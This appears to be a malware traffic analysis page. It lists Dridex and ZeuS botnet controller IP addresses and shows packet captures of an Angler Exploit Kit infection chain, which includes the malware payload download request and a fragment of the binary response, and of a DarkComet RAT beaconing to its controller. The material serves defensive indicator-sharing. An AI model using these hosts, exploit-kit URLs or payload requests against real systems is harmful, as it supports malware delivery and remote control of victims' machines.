
Malware Traffic Analysis, Traffic Samples and Indicators



Malware Botnet IP Infrastructure Dridex Dyre Dryzea


Malware Infrastructure Update:

Dridex:

IP                Content
5.44.216.44       .DOC file
85.214.196.227    Dridex VNC backconnect server
223.223.218.37    Dridex VNC backconnect server

ZeuS – Botnet Controllers

103.19.89.11
103.26.128.8
105.28.97.11
113.29.230.2
124.110.195.16
157.7.170.6
176.97.116.18
177.4.23.15
182.140.221.11
185.113.223.239
185.25.148.240
185.63.255.15
185.79.118.7
186.233.114.7
188.241.140.222
188.241.140.224
188.241.14.11
193.146.210.6
193.189.117.5
202.144.144.19
209.164.84.7
213.183.56.18
213.238.170.5
220.202.15.10
41.71.177.224
60.241.184.209
63.249.152.7
64.182.215.6
64.182.6.6
83.212.117.233
91.196.49.6
91.201.215.4
91.237.198.3


Angler Exploit Kit EK Silverlight Vulnerability Vector PCAP Converted Traffic Sample


2014-05-23 00:11:15.678281 IP 192.168.204.194.56962 > 192.168.204.2.53: 9876+ A? www.lordsroofing.co[.]uk. (40)
E..D……………….5.0..&…………www.lordsroofing.co[.]uk…..
2014-05-23 00:11:16.667729 IP 192.168.204.194.56962 > 192.168.204.2.53: 9876+ A? www.lordsroofing.co[.]uk. (40)
E..D……………….5.0..&…………www.lordsroofing.co[.]uk…..
2014-05-23 00:11:16.835288 IP 192.168.204.2.53 > 192.168.204.194.56962: 9876 2/0/0 CNAME lordsroofing.co[.]uk., A 81.169.145.157 (70)
E..bf…………….5…N\q&…………www.lordsroofing.co[.]uk………………………….Q…
2014-05-23 00:11:16.835909 IP 192.168.204.194.49241 > 81.169.145.157.80: Flags [S], seq 3445627289, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….M….Q….Y.P.`…….. .6……………
2014-05-23 00:11:16.836136 IP 192.168.204.194.49242 > 81.169.145.157.80: Flags [S], seq 1743890570, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….L….Q….Z.Pg……… ..8…………..
2014-05-23 00:11:16.981833 IP 81.169.145.157.80 > 192.168.204.194.49241: Flags [S.], seq 709316016, ack 3445627290, win 64240, options [mss 1460], length 0
E..,f…..c.Q……..P.Y*GM..`..`………….
2014-05-23 00:11:16.981987 IP 192.168.204.194.49241 > 81.169.145.157.80: Flags [.], ack 1, win 64240, length 0
E..(..@….W….Q….Y.P.`..*GM.P…$………
2014-05-23 00:11:16.982677 IP 192.168.204.194.49241 > 81.169.145.157.80: Flags [P.], seq 1:412, ack 1, win 64240, length 411
E…..@………Q….Y.P.`..*GM.P….]..GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.bing[.]com/search?q=lordsroofing.co[.]uk&qs=n&form=QBRE&pq=lordsroofing.co[.]uk&sc=1-18&sp=-1&sk=&cvid=6f52be04c25246ca9c6fde50f16b7a5b
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: www.lordsroofing.co[.]uk
Connection: Keep-Alive
2014-05-23 00:11:18.726680 IP 192.168.204.194.49251 > 91.185.215.137.80: Flags [P.], seq 1:308, ack 1, win 64240, length 307
E..[.U@…0…..[….c.P…n(“9.P…ct..GET /q304txnj5o HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.lordsroofing.co[.]uk/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: dgw.tumijilpwq[.]net
Connection: Keep-Alive
2014-05-23 00:11:18.726684 IP 91.185.215.137.80 > 192.168.204.194.49251: Flags [.], ack 308, win 64240, length 0
E..(i…….[……..P.c(“9…..P….D……..
2014-05-23 00:11:19.100357 IP 91.185.215.137.80 > 192.168.204.194.49251: Flags [P.], seq 1:1461, ack 308, win 64240, length 1460
E…jC….
+[……..P.c(“9…..P….>..HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Fri, 23 May 2014 04:11:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, must-revalidate, max-age=1
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 26 Jul 2040 05:00:00 GMT
Pragma: no-cache
Content-Encoding: gzip
2014-05-23 00:11:20.384208 IP 192.168.204.194.49251 > 91.185.215.137.80: Flags [P.], seq 308:578, ack 44005, win 64240, length 270
E..6..@…0’….[….c.P….(“..P…….GET /yVS75Oi1uFuUZw4pDl8FmO4AGwl5KtSaBYuueoeFyVc9CNZukDbhePX9-TvC6y5Z5viR-A== HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: dgw.tumijilpwq[.]net
Connection: Keep-Alive
2014-05-23 00:11:20.384223 IP 91.185.215.137.80 > 192.168.204.194.49251: Flags [.], ack 578, win 64240, length 0
E..(j……j[……..P.c(“……P….Q……..
2014-05-23 00:11:20.694812 IP 91.185.215.137.80 > 192.168.204.194.49251: Flags [P.], seq 44005:45465, ack 578, win 64240, length 1460
E…j….. .[……..P.c(“……P…K…HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Fri, 23 May 2014 04:11:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, must-revalidate, max-age=1
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 26 Jul 2040 05:00:00 GMT
Pragma: no-cache
Content-Encoding: gzip

—————————- MALWARE PAYLOAD GET REQUEST ———————————————

2014-05-23 00:11:21.643869 IP 192.168.204.194.49251 > 91.185.215.137.80: Flags [P.], seq 578:719, ack 96863, win 64240, length 141
E… .@…0…..[….c.P….(#..P…E ..GET /cVlzz_TT74aGPbC1Ot-xPe27DP9ANcEfzYolZK03kJA1aNUBxfQoDNvuq0S8ImOsw8YkJw== HTTP/1.1
Host: dgw.tumijilpwq[.]net
Cache-Control: no-cache
2014-05-23 00:11:21.643917 IP 91.185.215.137.80 > 192.168.204.194.49251: Flags [.], ack 719, win 64240, length 0
E..(j……B[……..P.c(#…..<P…)J……..
2014-05-23 00:11:22.101656 IP 91.185.215.137.80 > 192.168.204.194.49251: Flags [P.], seq 96863:98323, ack 719, win 64240, length 1460
E…j….. .[……..P.c(#…..<P…….HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Fri, 23 May 2014 04:11:18 GMT
Content-Type: application/octet-stream
Content-Length: 134152
Connection: keep-alive
Cache-Control: no-cache, must-revalidate, max-age=1
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 26 Jul 2040 05:00:00 GMT
Pragma: no-cache

,6.omjfgeldo..fg.ldonjfg!ldonjfgaldonjfgaldonjfgaldonjfgaldo.jfgos.an.o.@.e#.K2…D…….D……L.
N.. A.

Is the DarkComet RAT group even supporting it anymore?


I found the RAT on one of my local Windows machines; I forgot to sandbox the samples I was playing with. I do believe DarkComet RAT is not being maintained anymore, unless someone can confirm otherwise?

Don’t let the traffic fool you: the reason my box is only sending SYN packets to the hostile infrastructure is that I blocked their known hostile IPs at my uplink, so I can study it without risking PII, banking information, or even remote access to my workstation.


2015-05-19 22:31:03.730224 IP 192.168.1.101.41347 > 193.0.200.131.35689: Flags [S], seq 179598799, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4Wd@…W….e…….i
.u………v……………
2015-05-19 22:31:09.733831 IP 192.168.1.101.41347 > 193.0.200.131.35689: Flags [S], seq 179598799, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0Wl@…W….e…….i
.u…..p……………
2015-05-19 22:31:23.725572 IP 192.168.1.101.41348 > 193.0.200.131.35689: Flags [S], seq 2518902893, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4W.@…W….e…….i.#hm……………………
2015-05-19 22:31:26.725388 IP 192.168.1.101.41348 > 193.0.200.131.35689: Flags [S], seq 2518902893, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4W.@…W….e…….i.#hm……………………
2015-05-19 22:31:32.725971 IP 192.168.1.101.41348 > 193.0.200.131.35689: Flags [S], seq 2518902893, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0W.@…W….e…….i.#hm….p……………
2015-05-19 22:31:46.729820 IP 192.168.1.101.41358 > 193.0.200.131.35689: Flags [S], seq 4171882909, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4X.@…W!…e…….i………….E…………..
2015-05-19 22:31:49.729546 IP 192.168.1.101.41358 > 193.0.200.131.35689: Flags [S], seq 4171882909, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4X”@…W….e…….i………….E…………..
2015-05-19 22:31:55.730140 IP 192.168.1.101.41358 > 193.0.200.131.35689: Flags [S], seq 4171882909, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0X?@…V….e…….i……..p…0N……….
2015-05-19 22:32:09.736312 IP 192.168.1.101.41359 > 193.0.200.131.35689: Flags [S], seq 2284060342, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4X_@…V….e…….i.#……….o……………
2015-05-19 22:32:12.727663 IP 192.168.1.101.41359 > 193.0.200.131.35689: Flags [S], seq 2284060342, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4Xc@…V….e…….i.#……….o……………
2015-05-19 22:32:18.729255 IP 192.168.1.101.41359 > 193.0.200.131.35689: Flags [S], seq 2284060342, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0Xv@…V….e…….i.#……p……………
2015-05-19 22:32:32.731983 IP 192.168.1.101.41360 > 193.0.200.131.35689: Flags [S], seq 1973507909, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4X.@…V….e…….iu.WE……..)……………
2015-05-19 22:32:35.731848 IP 192.168.1.101.41360 > 193.0.200.131.35689: Flags [S], seq 1973507909, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4X.@…V….e…….iu.WE……..)……………
2015-05-19 22:32:41.735398 IP 192.168.1.101.41360 > 193.0.200.131.35689: Flags [S], seq 1973507909, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0[%@…T….e…….iu.WE….p…=………..
2015-05-19 22:32:55.736266 IP 192.168.1.101.41372 > 193.0.200.131.35689: Flags [S], seq 3110503877, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4].@…QQ…e…….i.f………..R…………..
2015-05-19 22:32:58.736953 IP 192.168.1.101.41372 > 193.0.200.131.35689: Flags [S], seq 3110503877, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4].@…QK…e…….i.f………..R…………..
2015-05-19 22:33:04.737554 IP 192.168.1.101.41372 > 193.0.200.131.35689: Flags [S], seq 3110503877, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0^^@…P….e…….i.f……p….[……….
2015-05-19 22:33:18.739418 IP 192.168.1.101.41373 > 193.0.200.131.35689: Flags [S], seq 2656021602, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4_q@…O….e…….i.O.b……………………
2015-05-19 22:33:21.740131 IP 192.168.1.101.41373 > 193.0.200.131.35689: Flags [S], seq 2656021602, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4`.@…Nn…e…….i.O.b……………………
2015-05-19 22:33:27.737710 IP 192.168.1.101.41373 > 193.0.200.131.35689: Flags [S], seq 2656021602, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0a+@…N….e…….i.O.b….p……………
2015-05-19 22:33:41.735637 IP 192.168.1.101.41374 > 193.0.200.131.35689: Flags [S], seq 1117003048, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4a.@…ML…e…….iB..(……………………
2015-05-19 22:33:44.735278 IP 192.168.1.101.41374 > 193.0.200.131.35689: Flags [S], seq 1117003048, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4a.@…MH…e…….iB..(……………………
2015-05-19 22:33:50.735813 IP 192.168.1.101.41374 > 193.0.200.131.35689: Flags [S], seq 1117003048, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0b @…M-…e…….iB..(….p……………
2015-05-19 22:34:04.737556 IP 192.168.1.101.41375 > 193.0.200.131.35689: Flags [S], seq 1815179909, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4b.@…M….e…….il1r…………………….
2015-05-19 22:34:07.737441 IP 192.168.1.101.41375 > 193.0.200.131.35689: Flags [S], seq 1815179909, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4b.@…M….e…….il1r…………………….
2015-05-19 22:34:13.741992 IP 192.168.1.101.41375 > 193.0.200.131.35689: Flags [S], seq 1815179909, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0b(@…M….e…….il1r…..p…+………..
2015-05-19 22:34:27.738715 IP 192.168.1.101.41376 > 193.0.200.131.35689: Flags [S], seq 447940370, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4bC@…L….e…….i……………………….
2015-05-19 22:34:30.738558 IP 192.168.1.101.41376 > 193.0.200.131.35689: Flags [S], seq 447940370, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4bH@…L….e…….i……………………….
2015-05-19 22:34:36.739128 IP 192.168.1.101.41376 > 193.0.200.131.35689: Flags [S], seq 447940370, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0bT@…L….e…….i……..p……………
2015-05-19 22:34:50.741967 IP 192.168.1.101.41377 > 193.0.200.131.35689: Flags [S], seq 802479073, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4bb@…L….e…….i/………………………
2015-05-19 22:34:53.742745 IP 192.168.1.101.41377 > 193.0.200.131.35689: Flags [S], seq 802479073, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4be@…L….e…….i/………………………
2015-05-19 22:34:59.743312 IP 192.168.1.101.41377 > 193.0.200.131.35689: Flags [S], seq 802479073, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0bo@…L….e…….i/…….p……………
2015-05-19 22:35:13.746161 IP 192.168.1.101.41378 > 193.0.200.131.35689: Flags [S], seq 4286877516, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4b.@…L….e…….i…L……..g……………
2015-05-19 22:35:16.755848 IP 192.168.1.101.41378 > 193.0.200.131.35689: Flags [S], seq 4286877516, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4b.@…L….e…….i…L……..g……………
2015-05-19 22:35:22.746428 IP 192.168.1.101.41378 > 193.0.200.131.35689: Flags [S], seq 4286877516, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0b.@…L….e…….i…L….p…{………..
2015-05-19 22:35:36.756173 IP 192.168.1.101.41379 > 193.0.200.131.35689: Flags [S], seq 1449551275, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4b.@…L….e…….iVfe………:f…………..
2015-05-19 22:35:39.757038 IP 192.168.1.101.41379 > 193.0.200.131.35689: Flags [S], seq 1449551275, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4b.@…L….e…….iVfe………:f…………..
2015-05-19 22:35:45.748575 IP 192.168.1.101.41379 > 193.0.200.131.35689: Flags [S], seq 1449551275, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0b.@…Lp…e…….iVfe…..p…No……….
2015-05-19 22:35:59.751368 IP 192.168.1.101.41381 > 193.0.200.131.35689: Flags [S], seq 247554514, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4b.@…LZ…e…….i..a…………………….
2015-05-19 22:36:02.751155 IP 192.168.1.101.41381 > 193.0.200.131.35689: Flags [S], seq 247554514, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4b.@…LP…e…….i..a…………………….
2015-05-19 22:36:08.751719 IP 192.168.1.101.41381 > 193.0.200.131.35689: Flags [S], seq 247554514, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0b.@…LO…e…….i..a…..p……………
2015-05-19 22:36:22.753536 IP 192.168.1.101.41382 > 193.0.200.131.35689: Flags [S], seq 2181989678, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4b.@…L:…e…….i………….7…………..
2015-05-19 22:36:25.752318 IP 192.168.1.101.41382 > 193.0.200.131.35689: Flags [S], seq 2181989678, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4fc@…H….e…….i………….7…………..
2015-05-19 22:36:31.758856 IP 192.168.1.101.41382 > 193.0.200.131.35689: Flags [S], seq 2181989678, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0h_@…F….e…….i……..p….A……….
2015-05-19 22:36:45.755730 IP 192.168.1.101.41391 > 193.0.200.131.35689: Flags [S], seq 2836538132, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4j.@…DX…e…….i..#………*E…………..
2015-05-19 22:36:48.755442 IP 192.168.1.101.41391 > 193.0.200.131.35689: Flags [S], seq 2836538132, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4l(@…C
…e…….i..#………*E…………..
2015-05-19 22:36:54.757029 IP 192.168.1.101.41391 > 193.0.200.131.35689: Flags [S], seq 2836538132, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0l.@…B….e…….i..#…..p…>N……….
2015-05-19 22:37:08.759753 IP 192.168.1.101.41392 > 193.0.200.131.35689: Flags [S], seq 3720042478, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4p!@…?….e…….i..W…………………….
2015-05-19 22:37:11.759597 IP 192.168.1.101.41392 > 193.0.200.131.35689: Flags [S], seq 3720042478, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4p.@…>….e…….i..W…………………….
2015-05-19 22:37:17.755178 IP 192.168.1.101.41392 > 193.0.200.131.35689: Flags [S], seq 3720042478, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0q.@…=….e…….i..W…..p……………
2015-05-19 22:37:31.755905 IP 192.168.1.101.41394 > 193.0.200.131.35689: Flags [S], seq 2992632758, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4u.@…9….e…….i._……….PR…………..
2015-05-19 22:37:34.761769 IP 192.168.1.101.41394 > 193.0.200.131.35689: Flags [S], seq 2992632758, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4u.@…9….e…….i._……….PR…………..
2015-05-19 22:37:40.755289 IP 192.168.1.101.41394 > 193.0.200.131.35689: Flags [S], seq 2992632758, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0w.@…7….e…….i._……p…d[……….
2015-05-19 22:37:54.764038 IP 192.168.1.101.41396 > 193.0.200.131.35689: Flags [S], seq 2904871920, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4x.@…6….e…….i.$……….uQ…………..
2015-05-19 22:37:57.764905 IP 192.168.1.101.41396 > 193.0.200.131.35689: Flags [S], seq 2904871920, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4x.@…6….e…….i.$……….uQ…………..
2015-05-19 22:38:03.767457 IP 192.168.1.101.41396 > 193.0.200.131.35689: Flags [S], seq 2904871920, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0x.@…6z…e…….i.$……p….Z……….
2015-05-19 22:38:17.770226 IP 192.168.1.101.41397 > 193.0.200.131.35689: Flags [S], seq 668794275, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4x.@…6i…e…….i’………………………
2015-05-19 22:38:20.770088 IP 192.168.1.101.41397 > 193.0.200.131.35689: Flags [S], seq 668794275, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4x.@…6_…e…….i’………………………
2015-05-19 22:38:26.770624 IP 192.168.1.101.41397 > 193.0.200.131.35689: Flags [S], seq 668794275, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0y.@…6….e…….i’…….p……………
2015-05-19 22:38:40.772380 IP 192.168.1.101.41402 > 193.0.200.131.35689: Flags [S], seq 3225445090, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4y%@…6….e…….i.@b……….=…………..
2015-05-19 22:38:43.772209 IP 192.168.1.101.41402 > 193.0.200.131.35689: Flags [S], seq 3225445090, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4y+@…6….e…….i.@b……….=…………..
2015-05-19 22:38:49.772752 IP 192.168.1.101.41402 > 193.0.200.131.35689: Flags [S], seq 3225445090, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0y5@…6….e…….i.@b…..p….F……….
2015-05-19 22:39:03.774532 IP 192.168.1.101.41403 > 193.0.200.131.35689: Flags [S], seq 1058743468, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4yH@…5….e…….i?.$…………………….
2015-05-19 22:39:06.775353 IP 192.168.1.101.41403 > 193.0.200.131.35689: Flags [S], seq 1058743468, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4yJ@…5….e…….i?.$…………………….
2015-05-19 22:39:12.767912 IP 192.168.1.101.41403 > 193.0.200.131.35689: Flags [S], seq 1058743468, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0yO@…5….e…….i?.$…..p……………
2015-05-19 22:39:26.771621 IP 192.168.1.101.41404 > 193.0.200.131.35689: Flags [S], seq 2149709015, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4yq@…5….e…….i.!………..e…………..
2015-05-19 22:39:29.771561 IP 192.168.1.101.41404 > 193.0.200.131.35689: Flags [S], seq 2149709015, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4yw@…5….e…….i.!………..e…………..
2015-05-19 22:39:35.772091 IP 192.168.1.101.41404 > 193.0.200.131.35689: Flags [S], seq 2149709015, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0y.@…5….e…….i.!……p….n……….
2015-05-19 22:39:49.769973 IP 192.168.1.101.41405 > 193.0.200.131.35689: Flags [S], seq 1562498373, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4y.@…5….e…….i]!.E……………………
2015-05-19 22:39:52.769701 IP 192.168.1.101.41405 > 193.0.200.131.35689: Flags [S], seq 1562498373, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4y.@…5….e…….i]!.E……………………
2015-05-19 22:39:58.770210 IP 192.168.1.101.41405 > 193.0.200.131.35689: Flags [S], seq 1562498373, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0y.@…5….e…….i]!.E….p……………
2015-05-19 22:40:12.772001 IP 192.168.1.101.41406 > 193.0.200.131.35689: Flags [S], seq 3692589618, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4y.@…5{…e…….i..r2……………………
2015-05-19 22:40:15.771784 IP 192.168.1.101.41406 > 193.0.200.131.35689: Flags [S], seq 3692589618, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4y.@…5u…e…….i..r2……………………
2015-05-19 22:40:21.772368 IP 192.168.1.101.41406 > 193.0.200.131.35689: Flags [S], seq 3692589618, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0y.@…5s…e…….i..r2….p……………
2015-05-19 22:40:35.780272 IP 192.168.1.101.41407 > 193.0.200.131.35689: Flags [S], seq 783358059, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4y.@…5G…e…….i…k………?…………..
2015-05-19 22:40:38.779938 IP 192.168.1.101.41407 > 193.0.200.131.35689: Flags [S], seq 783358059, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4y.@…5E…e…….i…k………?…………..
2015-05-19 22:40:44.780498 IP 192.168.1.101.41407 > 193.0.200.131.35689: Flags [S], seq 783358059, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0y.@…5A…e…….i…k….p….H……….
2015-05-19 22:40:58.782202 IP 192.168.1.101.41408 > 193.0.200.131.35689: Flags [S], seq 2032734727, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4z.@…5….e…….iy)……….k*…………..
2015-05-19 22:41:01.773078 IP 192.168.1.101.41408 > 193.0.200.131.35689: Flags [S], seq 2032734727, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4z.@…5….e…….iy)……….k*…………..
2015-05-19 22:41:07.774640 IP 192.168.1.101.41408 > 193.0.200.131.35689: Flags [S], seq 2032734727, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0z @…5….e…….iy)……p….3……….
2015-05-19 22:41:21.777441 IP 192.168.1.101.41421 > 193.0.200.131.35689: Flags [S], seq 4003494073, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4{.@…4*…e…….i..x…………………….
2015-05-19 22:41:24.779244 IP 192.168.1.101.41421 > 193.0.200.131.35689: Flags [S], seq 4003494073, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4}@@…1….e…….i..x…………………….
2015-05-19 22:41:30.780781 IP 192.168.1.101.41421 > 193.0.200.131.35689: Flags [S], seq 4003494073, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0}h@…1….e…….i..x…..p……………
2015-05-19 22:41:44.784349 IP 192.168.1.101.41429 > 193.0.200.131.35689: Flags [S], seq 205457714, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4}.@…1….e…….i.? 2……………………
2015-05-19 22:41:47.776434 IP 192.168.1.101.41429 > 193.0.200.131.35689: Flags [S], seq 205457714, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4}.@…1….e…….i.? 2……………………
2015-05-19 22:41:53.776949 IP 192.168.1.101.41429 > 193.0.200.131.35689: Flags [S], seq 205457714, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0}.@…1_…e…….i.? 2….p……………
2015-05-19 22:42:07.779704 IP 192.168.1.101.41434 > 193.0.200.131.35689: Flags [S], seq 3261083592, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@……..e…….i.`/…………………….
2015-05-19 22:42:10.781523 IP 192.168.1.101.41434 > 193.0.200.131.35689: Flags [S], seq 3261083592, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….{…e…….i.`/…………………….
2015-05-19 22:42:16.783094 IP 192.168.1.101.41434 > 193.0.200.131.35689: Flags [S], seq 3261083592, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@……..e…….i.`/…..p….!……….
2015-05-19 22:42:30.781824 IP 192.168.1.101.41435 > 193.0.200.131.35689: Flags [S], seq 2569012454, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@……..e…….i. ……….X9…………..
2015-05-19 22:42:33.781692 IP 192.168.1.101.41435 > 193.0.200.131.35689: Flags [S], seq 2569012454, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@……..e…….i. ……….X9…………..
2015-05-19 22:42:39.784246 IP 192.168.1.101.41435 > 193.0.200.131.35689: Flags [S], seq 2569012454, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@……..e…….i. ……p…lB……….
2015-05-19 22:42:53.786088 IP 192.168.1.101.41436 > 193.0.200.131.35689: Flags [S], seq 4101655066, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@……..e…….i.zJ…………………….
2015-05-19 22:42:56.785842 IP 192.168.1.101.41436 > 193.0.200.131.35689: Flags [S], seq 4101655066, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@……..e…….i.zJ…………………….
2015-05-19 22:43:02.786380 IP 192.168.1.101.41436 > 193.0.200.131.35689: Flags [S], seq 4101655066, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@……..e…….i.zJ…..p……………
2015-05-19 22:43:16.788265 IP 192.168.1.101.41437 > 193.0.200.131.35689: Flags [S], seq 2632900970, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….m…e…….i…j……..w……………
2015-05-19 22:43:19.787991 IP 192.168.1.101.41437 > 193.0.200.131.35689: Flags [S], seq 2632900970, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….k…e…….i…j……..w……………
2015-05-19 22:43:25.788551 IP 192.168.1.101.41437 > 193.0.200.131.35689: Flags [S], seq 2632900970, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@….i…e…….i…j….p……………
2015-05-19 22:43:39.785318 IP 192.168.1.101.41438 > 193.0.200.131.35689: Flags [S], seq 1708471948, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….D…e…….ie.6………Y……………
2015-05-19 22:43:42.781140 IP 192.168.1.101.41438 > 193.0.200.131.35689: Flags [S], seq 1708471948, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….7…e…….ie.6………Y……………
